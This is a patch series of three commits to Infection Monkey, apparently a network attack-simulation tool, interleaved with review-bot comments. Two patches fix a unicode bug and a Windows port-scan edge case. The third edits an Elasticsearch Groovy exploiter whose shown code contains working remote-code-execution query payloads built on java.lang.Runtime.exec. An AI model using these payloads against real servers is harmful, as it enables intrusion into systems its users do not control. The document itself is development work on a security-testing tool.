From ac8f218586853c96b377ca1d1c57667954efa6ab Mon Sep 17 00:00:00 2001
From: Oran Nadler
Date: Mon, 2 Apr 2018 01:47:15 -0700
Subject: [PATCH 1/3] fix unicode bug
---
 infection_monkey/config.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/infection_monkey/config.py b/infection_monkey/config.py
index 9ec784594..013380cb9 100644
--- a/infection_monkey/config.py
+++ b/infection_monkey/config.py
@@ -23,7 +23,7 @@ def _cast_by_example(value, example):
 """
 example_type = type(example)
 if example_type is str:
- return str(os.path.expandvars(value))
+ return os.path.expandvars(value).encode("utf8")
 elif example_type is tuple and len(example) != 0:
 if value is None or value == tuple(None):
 return tuple()
From 99b22cfa56d60ab89636962683479f20a7ef3dfe Mon Sep 17 00:00:00 2001
From: Daniel Goldberg
Date: Mon, 2 Apr 2018 16:49:18 +0300
Subject: [PATCH 2/3] Fail gracefully in case of no open ports on Windows
---
 infection_monkey/network/tools.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/infection_monkey/network/tools.py b/infection_monkey/network/tools.py
index 9f0cb8dee..5053b6c32 100644
--- a/infection_monkey/network/tools.py
+++ b/infection_monkey/network/tools.py
@@ -139,7 +139,7 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
 "On host %s discovered the following ports %s" %
 (str(ip), ",".join([str(s[0]) for s in connected_ports_sockets])))
 banners = []
- if get_banner:
+ if get_banner and (len(connected_ports_sockets) != 0):
 readable_sockets, _, _ = select.select([s[1] for s in connected_ports_sockets], [], [], 0)
 # read first BANNER_READ bytes
 banners = [sock.recv(BANNER_READ) if sock in readable_sockets else ""
From f1bbb255cd501c41567c1c57e32787a630ccbe40 Mon Sep 17 00:00:00 2001
From: Daniel Goldberg
Date: Mon, 2 Apr 2018 17:19:45 +0300
Subject: [PATCH 3/3] Fix edge case in ElasticGroovy
---
 infection_monkey/exploit/elasticgroovy.py | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
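Review bot: In `_cast_by_example`, `os.path.expandvars(value).encode("utf8")` only works when `expandvars` returns text; if this is Python 2 (which the `str`/unicode fix suggests) and `value` is already a byte `str` holding non-ASCII bytes, `.encode` first decodes it as ASCII and raises `UnicodeDecodeError`. Encoding only when needed avoids that: `expanded = os.path.expandvars(value)` followed by `return expanded.encode("utf8") if isinstance(expanded, unicode) else expanded`. The branch also has no comment saying that the result must be a byte string, which is the reason for the change. The function body starts and continues outside the hunk.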
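Review bot: The new guard `if get_banner and (len(connected_ports_sockets) != 0):` in `check_tcp_ports` carries no comment saying why it is needed, so the Windows-specific reason lives only in the commit title; a line such as `# select() on Windows raises if all three lists are empty` above it would keep the check from being simplified away later. The condition also reads more idiomatically as `if get_banner and connected_ports_sockets:`. The banner comprehension continues past the end of the hunk, so whether a failing `recv()` on one socket is handled there cannot be seen from here.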
diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py
index bf904724e..cdd3e0dcb 100644
--- a/infection_monkey/exploit/elasticgroovy.py
+++ b/infection_monkey/exploit/elasticgroovy.py
@@ -25,11 +25,11 @@ class ElasticGroovyExploiter(HostExploiter):
 MONKEY_RESULT_FIELD = "monkey_result"
 GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
 JAVA_IS_VULNERABLE = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.Runtime\\")'
- JAVA_GET_TMP_DIR =\
+ JAVA_GET_TMP_DIR = \
 GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"java.io.tmpdir\\")'
 JAVA_GET_OS = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"os.name\\")'
 JAVA_CMD = GENERIC_QUERY \
- % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
+ % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
 JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'
 DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
@@ -139,8 +139,8 @@ class ElasticGroovyExploiter(HostExploiter):
 http_thread.join(self.DOWNLOAD_TIMEOUT)
 http_thread.stop()
 if (http_thread.downloads != 1) or (
- 'ELF' not in
- self.check_if_remote_file_exists_linux(target_path)):
+ 'ELF' not in
+ self.check_if_remote_file_exists_linux(target_path)):
 LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
 return False
 return True
@@ -232,5 +232,5 @@ class ElasticGroovyExploiter(HostExploiter):
 try:
 json_resp = json.loads(response.text)
 return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
- except KeyError:
+ except (KeyError, IndexError):
 return None
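Review bot: The `try` block in the last hunk still lets `ValueError` escape, because `json.loads(response.text)` raises it when the reply is not JSON, and a `TypeError` is possible when `hits` or `fields` has an unexpected type; the response comes from the remote host, so its shape should not be trusted. Widening the handler to `except (KeyError, IndexError, ValueError, TypeError):` keeps the existing "return None on a malformed reply" behaviour for all of these cases. The enclosing method starts outside the hunk.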